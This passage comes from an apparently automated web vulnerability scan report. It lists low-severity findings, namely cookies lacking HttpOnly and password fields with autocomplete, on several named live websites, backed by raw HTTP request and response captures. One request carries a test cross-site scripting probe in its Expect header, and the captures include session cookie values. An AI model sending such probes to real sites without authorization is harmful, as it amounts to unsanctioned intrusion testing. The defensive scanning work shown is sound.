<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
17.169. http://www.usahockey.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usahockey.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usahockey.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BALANCEID=mycluster.node3; path=/;
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=adr1k555psq425yrmsw0pzuo; path=/; HttpOnly
Set-Cookie: HockeyType=ICE; expires=Wed, 02-May-2012 00:18:30 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="/Ja
...[SNIP]...
17.170. http://www.usjobsources.com/MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usjobsources.com
Path:   /MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MjMwODJ8NzA2N3wxMjYwNjY3fHYy/r?p=7067&t=2&a=31s-2100u&c1=vulnerability%20management HTTP/1.1
Host: www.usjobsources.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: ServerID=1034; path=/; expires=Tue, 03-May-2011 04:18:25 GMT
Date: Sun, 01 May 2011 23:32:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: RSNAME=b-adnfews03; expires=Mon, 02-May-2011 23:32:52 GMT; path=/; domain=www.usjobsources.com
Set-Cookie: LOGIN_TRACKERMjMwODJ8NzA2N3wxMjYwNjY3fHYy=NzA2Ny0yMzA4Mi0xMjYwNjY3LTMxcy0yMTAwdS0%3D%7Cwvh5glat; expires=Mon, 02-May-2011 23:32:52 GMT; path=/; domain=www.usjobsources.com
P3P: CP="IDC DSP COR CURa ADMa DEVa PSAa PSDa CONi TELi OUR DELa BUS IND PHY UNI PUR COM NAV INT DEM", CP="IDC DSP COR CURa ADMa DEVa PSAa PSDa CONi TELi OUR DELa BUS IND PHY UNI PUR COM NAV INT DEM"
Set-Cookie: REDIRECT_TRACKER23082=wvh5glat; expires=Mon, 02-May-2011 23:32:53 GMT; path=/; domain=www.usjobsources.com
Set-Cookie: MULTI_REDIRECT_TRACKER230821725572573=MTIzMg%3D%3D; expires=Mon, 02-May-2011 23:32:53 GMT; path=/; domain=www.usjobsources.com
Location: http://usjobsresource.com/3?s=31s-2100u
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

18. Password field with autocomplete enabled  previous  next
There are 14 instances of this issue:

18.1. http://insurancenewsnet.com/article.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
<!-- end Tooltips -->
<form name="aspnetForm" method="post" action="article.aspx?id=257992" id="aspnetForm">
<div>
...[SNIP]...
<p style="padding:0px 5px; margin-bottom:0;">Password: <input name="ctl00$Template_navigation$txtLoginPassword" type="password" id="ctl00_Template_navigation_txtLoginPassword" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)) {__doPostBack('ctl00$Template_navigation$btnLoginUser', '');return false;}} else {return true}; " style="width:115px;" /></p>
...[SNIP]...
18.2. https://www.crankyape.com/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
<hr width="645" size="1">
   
<FORM name="BidOnItem26361" onsubmit="return ValidateFields(this)" action="default.asp" ID="Form1">
<input type="hidden" name="pg" value="ProcBid" ID="Hidden1">
...[SNIP]...
<td><input type="password" name="PASSWORD" size="25"></td>
...[SNIP]...
18.3. https://www.crankyape.com/member/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /member/ HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD; ASP.NET_SessionId=wcvayn45psp4cd3wlkyqwt45

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 02:10:51 GMT
Content-Length: 6535
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html xmlns=
...[SNIP]...
<body>
<form name="form1" method="post" action="Default.aspx" id="form1">
<div>
...[SNIP]...
<td>
<input name="txtPassword" type="password" id="txtPassword" />
</td>
...[SNIP]...
18.4. https://www.crankyape.com/member/registration.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /member/registration.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /member/registration.aspx HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 01:53:57 GMT
Content-Length: 73292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=udtimieu5ipjefqiu2icmf45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CrankyApe.c
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="registration.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td align="left">
<input name="ctl00$cphMainContent$txtMemPass1" type="password" maxlength="30" size="30" id="ctl00_cphMainContent_txtMemPass1" class="reqField" />
</td>
...[SNIP]...
<td align="left"><input name="ctl00$cphMainContent$txtMemPass2" type="password" maxlength="30" size="30" id="ctl00_cphMainContent_txtMemPass2" class="reqField" /></td>
...[SNIP]...
18.5. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...
18.6. http://www.greenhulk.net/forums/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</h2>
   
       <form class="block vbform" method="post" action="login.php?do=login" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">    
           <input type="hidden" name="do" value="login" />
...[SNIP]...
</label>
                       <input type="password" class="primary textbox" id="vb_login_password" name="vb_login_password" tabindex="1" />
                   </div>
...[SNIP]...
18.7. http://www.greenhulk.net/forums/register.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>

<form id="registerform" action="register.php?do=addmember" name="register" method="post" onsubmit="return verify_passwords(password, passwordconfirm);" class="vbform block">

   
   <h2 class="blockhead">
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="password" id="password" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...
</label>
                       <input type="password" class="textbox" name="passwordconfirm" id="passwordconfirm" maxlength="50" value="" tabindex="1" />
                   </li>
...[SNIP]...
18.8. http://www.greenhulk.net/forums/register.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/register.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forums/register.php HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.1.10.1304319910

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:28:52 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:28:52 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:28:52 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <me
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...
18.9. http://www.greenhulk.net/forums/showthread.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Log in" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profile
...[SNIP]...
18.10. http://www.hotwheelscollectors.com/HWCErrorPage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
<!-- UC: Mini Signin -->
<form method="post" id="Form1" action="/UMS/Login.aspx" onkeydown="if(event.which || event.keyCode){if ((event.which == 13) || (event.keyCode == 13)){document.getElementById('MiniSignIn_btnSubmit').click();return false;}} else {return true};">

<input type="hidden" id="formSource" name="formSource" value="MiniSignIn" />
...[SNIP]...
<div class="float-left"><input type="password" name="txtPassword" id="txtPassword" maxlength="40" tabindex="1002" class="minifield" /></div>
...[SNIP]...
18.11. http://www.japanator.com/elephant/login.phtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /elephant/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:55:17 GMT
Server: lighttpd/1.4.28
Content-Length: 47739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login | Japan
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="http://www.japanator.com/elephant/login.phtml" method="post">

<input type="hidden" name="back_to" value="">
...[SNIP]...
<br/>
   <input type="password" name="password">
</p>
...[SNIP]...
18.12. http://www.japanator.com/elephant/signup.phtml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /elephant/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:06:57 GMT
Server: lighttpd/1.4.28
